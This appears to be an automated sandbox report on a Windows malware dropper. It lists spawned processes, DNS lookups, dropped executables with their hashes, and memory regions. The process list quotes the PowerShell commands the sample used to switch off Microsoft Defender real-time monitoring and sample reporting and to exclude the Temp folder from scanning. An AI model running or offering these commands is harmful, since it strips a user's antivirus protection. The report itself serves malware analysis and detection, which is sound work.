PID 1416 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe

"C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon166dc6040fb8726.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16bd4a93b822a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1661118952.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16b7581baf7.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon167f9db638e4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16ad13d7ad1b02.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1618e4439d986270.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1631358b82299bd8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16d070a064013c841.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16734014a69dec.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16737798ac26f984.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon164c5af508c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16957e622fa390.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16ac385cfd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16e127a54386dd68.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon161bd381a14aea5c.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe

MD5 0c0e1a604e0da52b76b20bc2adba8192
SHA1 c6df017caaebdfbf3d86b022570aeb6c2cee1f3a
SHA256 a8e57cdcd0fa1640cde72c232cd5c3b07be08f2ac5ed88d78dcc93b627c935e2
SHA512 797568375efa0902493cadffa79ad0638a34d3cda2ae961557fe9c77c463a9ffd4a40695464aeaf19a3be7f29c085538e0e1eaac52e7c15a1de95b2db2621d8e

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/1416-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1416-79-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1416-78-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2308-80-0x000000007335E000-0x000000007335F000-memory.dmp

memory/1416-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2264-82-0x0000000073350000-0x0000000073B00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon161bd381a14aea5c.exe

MD5 cf7a094bc477eeba7e8d568f12bf0ba9
SHA1 4b9bca3bd6d3d1125dbd13993d0c4118e479ae79
SHA256 4960c14c5b5a9d4abf64ef2cf3d2357403ad7ab5173bf5f063f162557bbfe2e5
SHA512 f9e0579878f649f1588435c0bc8846d84058666aebd6f676b1e9ec51950375360b01333e073d7e7cdcbe683f78bb6de7f945d8e2d3290ba9dd4512480e6d25da

memory/2264-99-0x0000000005180000-0x00000000057A8000-memory.dmp

memory/1416-110-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2308-111-0x0000000073350000-0x0000000073B00000-memory.dmp

memory/2308-114-0x00000000055D0000-0x0000000005636000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zivcm5b1.un4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2308-131-0x0000000073350000-0x0000000073B00000-memory.dmp

memory/2264-136-0x0000000006090000-0x00000000060AE000-memory.dmp

memory/2264-137-0x00000000060C0000-0x000000000610C000-memory.dmp

memory/2264-121-0x0000000073350000-0x0000000073B00000-memory.dmp

memory/2264-120-0x0000000005B10000-0x0000000005E64000-memory.dmp

memory/2308-113-0x0000000005460000-0x00000000054C6000-memory.dmp

memory/2264-112-0x0000000005920000-0x0000000005942000-memory.dmp

memory/1416-109-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2264-108-0x0000000073350000-0x0000000073B00000-memory.dmp

memory/1416-107-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1416-106-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1416-105-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1416-100-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16e127a54386dd68.exe

MD5 7d7f14a1b3b8ee4e148e82b9c2f28aed
SHA1 649a29887915908dfba6bbcdaed2108511776b5a
SHA256 623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb
SHA512 585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16ac385cfd.exe

MD5 0b8ef03e8c9752a88faa2907a62d0783
SHA1 283b229a5c68528363ab3595ea8b5b37025fb1ec
SHA256 63ddcac0ee5ecd7239cb817b176480275ad3f6fc9bfb1f4a3086d19e578da4ea
SHA512 bccb76031a7df528ebed8d3c33d5ea8f2bdd69858e26931e8ad348a3805fdfd9b377ae416c087fa6959c899fb17f9d1561773ac06aa6b803b8e73bc9832468ec

memory/2264-149-0x0000000006620000-0x000000000663E000-memory.dmp

memory/2264-150-0x0000000007060000-0x0000000007103000-memory.dmp

memory/2264-139-0x0000000070560000-0x00000000705AC000-memory.dmp

memory/2264-138-0x0000000006640000-0x0000000006672000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16957e622fa390.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

memory/2264-152-0x00000000073B0000-0x00000000073CA000-memory.dmp

memory/2264-151-0x00000000079F0000-0x000000000806A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon164c5af508c3.exe

MD5 3ede4ea9236fb79e46017591d7fa89ba
SHA1 a064bb878b2d4f136dadeb061f7321bfc617355b
SHA256 e41420775c1b48d6c59060a40002802bfd41195368c9c30130ce9ad83bb3f169
SHA512 7a7acce6cd4a8801885336d0dd5100ed3c925f9676c77c7192c7c54bc010dbb8cbc9e9b03bdba1ac6125f3139ab1a5d363cbab00b68b8b97ff6647a9cc5df434

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16737798ac26f984.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

memory/2264-153-0x0000000007430000-0x000000000743A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16734014a69dec.exe

MD5 58267e9b25e8df4530d4e7b4e8b273c0
SHA1 bb08b8638013fd6ac7fb30f0d674a0ada0dab5ac
SHA256 dce7b289556aa5027cd166ce2916b0d25081377071c3428609f6368d1d26e1ef
SHA512 488f40ce734197fa4aa36bda91a9283ddabfc41117f367a3643bebecb6bb5f43e170c4804989a934fa3cc25d1a07559b1e1abf14d3efc0aacc3323280c3cbec3

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16d070a064013c841.exe

MD5 ebf343da80ba03d41832a6f1178940f8
SHA1 06b5689406be75fe9b6ff3b6ba68d712f6597819
SHA256 85dfc3e1c3748a6a48b0b1b34df6853d68e26ce12c13463a9b0f2cc899260bd5
SHA512 5c971e9eccc7bcca8a77c46ba7f9ff1765eecf243146f805eb90809e3bd28e4b4038150bf7f95fa19ea5b90f77af5c1f4916093df13b3b732dff8aeee68755c4

memory/2264-154-0x0000000007620000-0x00000000076B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon1618e4439d986270.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16ad13d7ad1b02.exe

MD5 6881c116d2a78c375de73a298a732427
SHA1 36112627325603afc821d28b2da69f7da58e27ab
SHA256 c15359f15f0402b2db3b3704d0bacee6996c04bc1f37195eb02ac30cf2fc5844
SHA512 598cc49d79c236f6fc493438cd103e367c477480adf10f279613767536762c67c1b712bb00fb620c535647f1e002d88d0cba60cab02ef602be8e7bc009c0d728

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon167f9db638e4.exe

MD5 999cfa89375bc54358907287d1fc7462
SHA1 7e67a8f2161e36da1d26a5bc3dc70eb00f313345
SHA256 e74473a1edde3b073d2242d2efaa98bf548ab71a8515110a05f39a9f6a0ae69a
SHA512 169df388945cef468b88e1e963c68a2fae62e6ec238d53c8aaf6712e75789a6c94673f7c338ad5de42d4a6733f9919e7d7b7d087c5e94514479c1e85e8153b65

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16b7581baf7.exe

MD5 b33a3fb6b491b328dacaf18c302b20de
SHA1 41281e81ec9ba49af4af18f3c61038e62818d3c6
SHA256 088d635941437ab637abea3d698c71dedf0f24d5dffd62f6b1fe4329b8e7de72
SHA512 a247cf6aa60d3cbacc46242a51793c6a6e3a3c00c1276af6b59d6b60ffb40d7915b09a9169a521f4326ecc622be29e71fb4cbe705f52e4e28e5d5802630b793e

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16bd4a93b822a.exe

MD5 34025b6eb0aa1236b91ca1ab765acbd3
SHA1 cfb12b89aa55158e7b0b38f8fd5b8bf590660793
SHA256 db3c03a5f74e0e9114883bb5c0db60abb4f32e4712e32a953179f0626c529b14
SHA512 d5d4cf4f3dcdc79ae92792307ee82922af55bdc4d81708c140c03c1979da3b8e2d0f009ddde6f680a0197ab7668824dab81393ba9bca6533a603eddd30e22fdd

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon166dc6040fb8726.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

memory/2264-81-0x0000000004B10000-0x0000000004B46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon1631358b82299bd8.exe

MD5 917921d15cb0e081cc589fb8623cbfdc
SHA1 a8c5dc84e100aea9c9de8b2e76c6469d0de8c747
SHA256 c2496991fe4a847ed5585f00e8fdf2dc9fc679636f5e9e4add9086649bb24717
SHA512 8eff74f2ba55392c0bb33159aa367cccede62eda00c0ef03b2f05ee42cdeb41341f780c6757b997b87a0e2336e3f31135b24b72865d69e449623a230a781d3ba

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon1661118952.exe

MD5 83a0d323899ff2f761f434dc017900ba
SHA1 a44010a7d098a737f30ea04d280502d99718b18d
SHA256 b90fd0244165858b4b4d1390f039731fbce2730a7482588f13e66e52e20fe124
SHA512 40b268d0c1181ea950f4f7b3fa3bf10bcb84330047657ba2c1adec4c4e5f99b24d988086730bdebe3176e8e2d26fe841a4feaf9376c0d002fdb77291e97f7f6e

memory/1416-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1416-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1416-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1416-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1416-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1416-69-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1416-68-0x0000000064941000-0x000000006494F000-memory.dmp

memory/1416-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1416-66-0x00000000007A0000-0x000000000082F000-memory.dmp

memory/1416-65-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/1416-73-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1416-56-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2264-155-0x00000000075B0000-0x00000000075C1000-memory.dmp

memory/2264-156-0x00000000075E0000-0x00000000075EE000-memory.dmp

memory/2264-157-0x00000000075F0000-0x0000000007604000-memory.dmp

memory/2264-158-0x00000000076E0000-0x00000000076FA000-memory.dmp

memory/2264-159-0x00000000076D0000-0x00000000076D8000-memory.dmp

memory/2264-162-0x0000000073350000-0x0000000073B00000-memory.dmp

memory/2308-163-0x0000000070560000-0x00000000705AC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3d351bc356fa397136097260718ca335
SHA1 5d5d43ab5bad564d786751d2479be1f60f8187cd
SHA256 a83be14a6ad91ed16c94ca20315c15ea595348ddcda8a10d299a1e99f650e00a
SHA512 69ffb392f21225c9ecf1790a9d5cf53694aa2f3a33d382ba2555e228b3d63e65c6c72e3983cddb2ce1883df7e7b0e52078ef8e688c6b0b5d46962d92846b413b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/2308-176-0x0000000073350000-0x0000000073B00000-memory.dmp